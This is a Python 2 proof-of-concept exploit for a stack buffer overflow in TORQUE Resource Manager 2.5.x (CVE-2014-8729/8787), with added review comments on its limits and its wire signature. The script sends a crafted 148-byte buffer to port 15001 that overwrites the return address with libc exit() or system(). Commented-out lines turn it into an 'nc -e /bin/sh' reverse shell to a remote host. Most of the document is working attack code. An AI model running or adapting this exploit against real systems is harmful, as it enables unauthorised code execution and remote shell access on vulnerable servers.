#!/usr/bin/env python
# Exploit Title: TORQUE Resource Manager 2.5.x-2.5.13 stack based buffer overflow
# Date: 10 Nov 2014
# Exploit Author: @inso - Moussajee Thomas, @socks - Laurenceau Gary
# Vulnerability discovered by: Moussajee Thomas, Laurenceau Gary
# CVE: CVE-2014-8729, CVE-2014-8787
# Vendor Homepage: http://www.adaptivecomputing.com/
# Software Link: http://www.adaptivecomputing.com/support/download-center/torque-download/
# Version tested: 2.5.12
# Version affected : 2.5.x - 2.5.13
# Tested on: Debian 32bit with ASLR disabled
# ROP on exit(42) with control of EAX register
# can be customisable (uncomment line) for reverse shellcode execution if NX is disabled
#
# NOTE(review): proof-of-concept for the CVEs listed above. Everything it
# does is a single TCP send of a fixed 148-byte buffer to port 15001; it never
# reads a reply, so it cannot observe whether the target crashed or exited.
# The absolute libc addresses in `plt` come from the author's test VM
# ("ASLR disabled" above), so the buffer only lines up on that exact image:
# ASLR and NX, both named as disabled in the header, are the mitigations that
# break this approach, and the stated affected range ends at 2.5.13.
# Python 2 only: `print` is a statement and `packet` is a byte string that is
# concatenated with the `struct.pack` result.

import socket
import sys
import struct


def off(o):
    """Pack the integer `o` as a native unsigned 32-bit value (struct 'I').

    Native byte order and size: 4 bytes, little-endian on the x86 target
    named in the header. Used to splice addresses into the buffer.
    """
    return struct.pack('I',o)


# Hard-coded libc addresses on the author's image; see the review note above.
plt = {
    'exit' : off(0xb7dd8270),
    'system': off(0xb7de4c30),
}

# NOTE(review): the `else` below belongs to the `== 2` test, not the `== 3`
# one, so a three-argument run is overridden by the hard-coded defaults.
# (sys.argv[2] would also still be a str, which connect() would not accept
# as a port.)
if (len(sys.argv) == 3):
    ip = sys.argv[1]
    port = sys.argv[2]
if (len(sys.argv) == 2):
    ip = sys.argv[1]
    port = 15001
else:
    ip = "192.168.211.145"
    port = 15001

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))

offset = 143 # number to read
# header dis protocol torque: len("143") -> "3", then "143", then "1"
# (5 bytes: "31431").
# NOTE(review): the header announces 143 bytes while 148 are actually sent
# (see the size comment at the end). Assuming the author's dis-protocol
# reading is right, that announced-vs-actual length mismatch on port 15001
# is the observable characteristic of this PoC on the wire.
header = str(len(str(offset))) + str(offset) + '1'

# Buffer layout: 5 (header) + 60 + 4 + 4 + 1 = 74 bytes, then 'b' padding
# up to 148 in total.
packet = header
packet += 'c' * 60 # padding
packet += plt['exit'] # set EIP to exit() address (comment for bin/sh execution) may differ: print exit on gdb
#packet += plt['system'] # set EIP to system() address (uncomment for bin/sh execution) may differ: print system on gdb
packet += 'a' * 4 # padding
packet += chr(42) # set EAX to 42 '*' (comment for bin/sh execution)
#
#packet += ('\xb4\x5f\xee\xb7') # set EAX on "/bin/sh" address on libc (uncomment for bin/sh execution) may differ: find [system address], +999999999999, "/bin/sh" on gdb
#packet += (0x8bd5930 + (len(packet) + 1 - len(header)) # EAX on buffer address + 68 for set at "netcat"
#packet = 'nc -e /bin/sh 192.168.1.19 1337' + '\x00' # reverse shell and set null at the end of the string
packet += 'b' * (148 - len(packet)) # padding (comment for bin/sh execution)

print "sending buffer to " + ip + ':' + str(port)
print "size : " + str(len(packet)) # 148 if offset = 143
#print packet.encode("hex")
# Fire-and-forget: nothing is read back before the socket is closed.
s.sendall(packet)
s.close()